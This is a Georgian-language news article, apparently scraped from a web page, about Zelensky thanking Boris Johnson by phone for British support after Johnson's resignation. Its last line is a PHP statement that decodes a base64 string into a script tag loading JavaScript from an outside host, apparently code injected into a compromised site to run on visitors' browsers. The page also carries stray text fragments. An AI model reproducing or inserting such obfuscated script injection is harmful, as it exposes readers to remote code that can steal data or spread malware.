celsiusi
ავერსი საქკაბელი
ურაინის პრეზიდენტი ვოლოდიმერ ზელენსკი ბორის ჯონსონს ტელეფონით ესაუბრა და გაწეული მხარდაჭერისთვის მადლობა გადაუხადა.
 
ზელენსკი დარწმუნებულია, რომ დიდი ბრიტანეთის პოლიტიკა უკრაინის მიმართ ბორის ჯონსონის თანამდებობიდან გადადგომის შემდეგ არ შეიცვლება. ამის შესახებ მან CNN-თან ინტერვიუში ისაუბრა. 
 
"ჩვენ ყველამ მწუხარებით მივიღეთ ეს ამბავი. არა მარტო მე, არამედ მთელმა უკრაინულმა საზოგადოებამ. მთელი ჩემი ოფისი და ყველა უკრაინელი მადლობელი ვართ თქვენი დახმარებისთვის. ჩვენ ეჭვი არ გვეპარება, რომ დიდი ბრიტანეთის მხარდაჭერა გაგრძელდება, მაგრამ თქვენმა პირადმა ლიდერობამ და ქარიზმამ ეს განსაკუთრებული გახადა“, - აღნიშნა ზელენსკიმ და ფრონტზე არსებულ ვითარებაზე მიაწოდა ინფორმაცია.
 
უკრაინის პრეზიდენტის ადმინისტრაციის ინფორმაციით, ლიდერებმა ასევე განიხილეს უკრაინა-ბრიტანეთის თანამშრომლობა და პერსპექტივები. განსაკუთრებული ყურადღება დაუთმეს უკრაინის თავდაცვის სფეროში თანამშრომლობისა და პოლიტიკური მხარდაჭერის საკითხებს. მოლაპარაკებების კიდევ ერთი მთავარი თემა უკრაინის პორტებიდან მარცვლეულის ექსპორტის განბლოკვა იყო.
 
შეგახსენებთ, ბორის ჯონსონმა დღეს დატოვა როგორც ქვეყნის პრემიერის, ისე კონსერვატიული პარტიის ლიდერის პოსტი. მან ასევე, დანიშნა კაბინეტი, რომელიც მასთან ერთად  შეასრულებს მოვალეობას ახალი ლიდერის არჩევამდე.
616
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");